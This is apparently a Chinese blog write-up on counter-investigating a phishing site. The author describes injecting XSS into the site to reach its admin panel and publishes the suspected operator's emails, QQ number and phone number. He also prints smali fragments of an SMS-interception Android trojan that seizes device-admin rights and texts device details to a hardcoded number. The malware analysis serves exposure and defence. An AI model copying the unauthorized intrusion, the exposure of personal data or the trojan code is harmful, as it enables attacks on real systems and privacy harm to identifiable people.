时间:2023-08-25 19:23:29 点击次数:8
事件起因很简单,因为一条短信【伪基站】而引起的。。【目标站点:http://www.XXXXXlb.com】
鱼站的主页
鱼站钓鱼界面
丢一段XSS进去玩玩
过了一会,XSS平台收到了返回的信息并得到后台地址【
http://www.XXXXXlb.com/houtai987】网站让下载的那个APP是款短信拦截木马,一会顺便玩玩
后台数据蛮多的。。。
本人对数据进行了简单的整理
由于涉及个人隐私以及资金安全,就不提供样本和源文件了
0X02社工
首先,对域名进行了WHIOS反查,发现其用f-sz@foxmail.com邮箱注册了28个域名
在排查过程中又发现f-sz@qq.com和fengshizhou@vip.qq.com两个邮箱其中,[email]f-sz@qq.com[/email]注册了7个域名,同时确认其名为冯*周
fengshizhou@vip.qq.com注册了共计64个域名
同时,对名字为冯*周进行了反查,发现注册了20余个域名
又发现邮箱地址为179803590@qq.com和chl80sy@163.com的两个地址,由于后续域名及涉及QQ和邮箱过多,不再累赘
0X03拦截马分析
所需工具:Android Killer1.31
环境配置:
1、所需软件:JAVA_JDK
Android Killer1.31
2、安装JAVA_JDK后依次计算机(我的电脑)→属性,然后看图
然后新建JAVA_HOME、CLASSPATH、Path三个变量
相关变量设置如下• JAVA_HOME: C:\Program FiIes\Java\jdkxxxxxx【这个是你JDK安装地址!直接到根目录下即可!】• CLASSPATH: .;%JAVA_HOME%\Iib\dt.jar;%JAVA_HOME%\Iib\tools.jar;• Path: ;%JAVA_HOME%\bin;%JAVA_HOM E%\jre\bin;
3、运行AndroidKiller
打开我们的样本【拦截马】
APP权限&信息名称:中国移动兑换客户端包名:com.noticessk.w.q.aerosp入口:com.phone2.stop.activity.MainActivity版本信息:Ver:5.5.365(98) SDK:8 TargetSDK:19权限信息: android.permission.RECEIVE_WAP_PUSH//允许APP接受WAP信息 android.permission.RECEIVE_BOOT_COMPLETED//自启动 android.permission.MODIFY_AUDIO_SETTINGS//音频改动 android.permission.WRITE_EXTERNAL_STORAGE//写入/读取SD卡 android.permission.RECEIVE_USER_PRESENT//读取联系人信息 android.permission.READ_CONTACTS//读取联系人信息 android.permission.INTERNET//网络信息(允许访问网络) android.permission.READ_PHONE_STATE//读取手机信息(识别码什么的) android.permission.READ_SMS//读取短/彩信 android.permission.WRITE_SETTINGS //修改系统全局设置 android.permission.VIBRATE//控制振动器 android.permission.RECEIVE_SMS//回复短信 android.permission.ACCESS_NETWORK_STATE//查看网络状态 android.permission.GET_TASKS//检索运行中的程序 android.permission.WRITE_SMS//写短信 android.permission.SEND_SMS//发送短信 android.permission.ACCESS_WIFI_STATE//查看WIFI状态由于该APP获取了过多的权限【甚至包括设备管理器权限】,所以我们有必要进行下一步分析
那么这个APP获取这么多权限干什么呢?我们继续来分析!看下面的代码(位置smail\com\phone\stop\db\a.smail)
return-void .end method .method public d()Ljava/lang/String; .locals 3 iget-object v0, p0, Lcom/phone/stop/db/a;->b:Landroid/content/SharedPreferences; const-string v1, "a100" const-string v2, "15605364232"//手机号出现! invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; move-result-object v0 return-object v0获取设备管理器权限进行自我保护【防止用户(被害者)卸载】
move-result v0 if-nez v0, :cond_0 new-instance v0, Landroid/content/Intent; const-string v2, "android.app.action.ADD_DEVICE_ADMIN" invoke-direct {v0, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V const-string v2, "android.app.extra.DEVICE_ADMIN" invoke-virtual {v0, v2, v1}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent; const-string v1, "android.app.extra.ADD_EXPLANATION" const-string v2, "\u63d0\u9ad8\u6743\u9650\u83b7\u53d6\u4fdd\u62a4" //提权获得保护 invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent; const/4 v1, 0x0由于出现了手机号,我们可以确定APP将一些隐私发送到了这个号码上,结果我们的下面分析也证明了这个想法
发送激活成功与否短信到15605364232
invoke-static {p0}, Lcom/phone/stop/db/a;->a(Landroid/content/Context;)Lcom/phone/stop/db/a; move-result-object v0 const/4 v1, 0x1 invoke-virtual {v0, v1}, Lcom/phone/stop/db/a;->a(Z)V const-string v0, "\u6fc0\u6d3b\u6210\u529f" //激活成功 invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V :cond_0 :goto_0 const/4 v1, 0x0 const-wide/16 v2, 08 invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->sendEmptyMessageDelayed(IJ)Z return-void :cond_1 const-string v0, "\u6fc0\u6d3b\u5931\u8d25" //激活失败 invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V goto :goto_0 .end method发送安装成功与否和识别码以及系统版本和手机型号等信息到15605364232
move-result-object v0 new-instance v1, Ljava/lang/StringBuilder; const-string v2, "\u8f6f\u4ef6\u5b89\u88c5\u5b8c\u6bd5\n\u8bc6\u522b\u7801:" //软件安装完毕!识别码: invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; move-result-object v0 move-result-object v0 const-string v1, ";\n\u7cfb\u7edf\u7248\u672c:" //系统版本: invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;//获取系统版本 move-result-object v0 invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V const-string v1, "\u578b\u53f7:"//型号 invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; move-result-object v0 sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String; invoke-static {v1}, Lcom/phone/stop/e/e;->a(Ljava/lang/String;)Ljava/lang/String; move-result-object v1 move-result-object v0 const-string v1, ";\n\u624b\u673a:"//获取手机厂商名字 invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder; move-result-object v00X04总结
至此,钓鱼网站的人基本信息已经拿到
姓名:冯*周
手机:1560****4232
QQ:1798****90
常用邮箱:f-sz@qq.com、fengshizhou@vip.qq.com、f-sz@foxmail.com、179803590@qq.com、chl80sy@163.com
